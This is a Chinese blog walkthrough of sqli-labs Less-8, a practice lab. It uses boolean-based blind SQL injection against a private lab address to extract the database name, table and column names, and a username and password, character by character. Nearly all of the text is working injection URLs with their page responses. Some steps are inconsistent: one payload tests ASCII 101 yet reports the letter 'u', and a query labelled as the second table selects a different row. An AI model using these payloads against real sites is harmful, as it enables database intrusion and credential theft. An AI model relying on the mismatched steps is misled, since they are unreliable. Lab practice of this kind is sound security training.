- sqli-labs第八关
(1) 求闭合字符
① 输入http://192.168.88.138:98/Less-8/?id=1'页面异常
② 输入http://192.168.88.138:98/Less-8/?id=1' and 1=1 -- + 页面正常
③ 输入http://192.168.88.138:98/Less-8/?id=1' and 1=2 -- + 页面异常
综上判断出该网站的闭合字符为’
(2) 求当前数据库名的长度
① 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())<10 -- + 页面正常
② 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())<5 -- + 页面异常
③ 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())<7 -- + 页面异常
④ 输入http://192.168.88.138:98/Less-8/?id=1' and length(database())=8 -- + 页面正常
综上可以判断出该数据库名长度为 8
(3) 求当前数据库名对应的ascii值(与求库名方法相同,逐一使用二分法判断数据库名每一位的ascii值)
① 当输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),1,1)) =115 -- + 页面正常
说明数据库名第一位是 s
② 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),2,1)) =101 -- + 页面正常
说明数据库名第二位是e
③ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),3,1)) =99 -- + 页面正常
说明数据库名第三位是c
④ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),4,1)) =101 -- + 页面正常
说明数据库名第四位是u
⑤ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),5,1)) =114 -- + 页面正常
说明数据库名第五位是r
⑥ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),6,1)) =105 -- + 页面正常
说明数据库名第六位是i
⑦ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),7,1)) =116 -- + 页面正常
说明数据库名第七位是t
⑧ 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((database()),8,1)) =121 -- + 页面正常
说明数据库名第8位是y
由上述可知,该数据库的库名为security
(4) 求表的数量(与求库名方法相同,使用二分法判断数量)
① 输入http://192.168.88.138:98/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4 -- + 页面正常
综上说明该数据库表的数量为4
(5) 求表名的长度
① 输入http://192.168.88.138:98/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 -- + 页面正常
说明第一个表名的长度为6
② 输入http://192.168.88.138:98/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 2,1))=7 -- + 页面正常
说明第二个表名长度为7
③ ....
(6) 求表名对应的ascii值
① 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117 -- + 页面正常
说明第四个表的第一个ascii值为u
② 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),2,1))=115 -- + 页面正常
说明第四个表的第二个ascii值为s
③ ...
综上求出第四个表的表名为users
(7) 求列的数量
输入http://192.168.88.138:98/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=3 --+ 页面正常
说明该表中列的数量为3
(8) 求列名对应的ascii值
① 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),1,1))=105 -- + 页面正常
说明第一列列名的第一个ascii值为i
② 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 -- + 页面正常
说明第一列列名的第二个ascii值为d
③ ...
④ 综上求出三列列名分别为:id,username,password
(9) 求字段的数量
输入http://192.168.88.138:98/Less-8/?id=1' and (select count(*) from users)=13 -- + 页面正常
说明一共有13条数据
(10) 求字段内容的长度
① 输入http://192.168.88.138:98/Less-8/?id=1' and length((select id from users limit 0,1))=1 --+ 页面正常
说明id字段的长度为1
(11) 求字段内容对应的ascii值
① 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+ 页面正常
说明第一个ascii值为D
② 输入http://192.168.88.138:98/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),2,1))=117 --+ 页面正常
说明第二个ascii值为u
③ ...
最终求出第一个字段id=1,username:Dumb,password:Dumb
标签:98,http,Less,88.138,第八,192.168,labs,sqli,id From: https://www.cnblogs.com/koitoYuu/p/17128870.html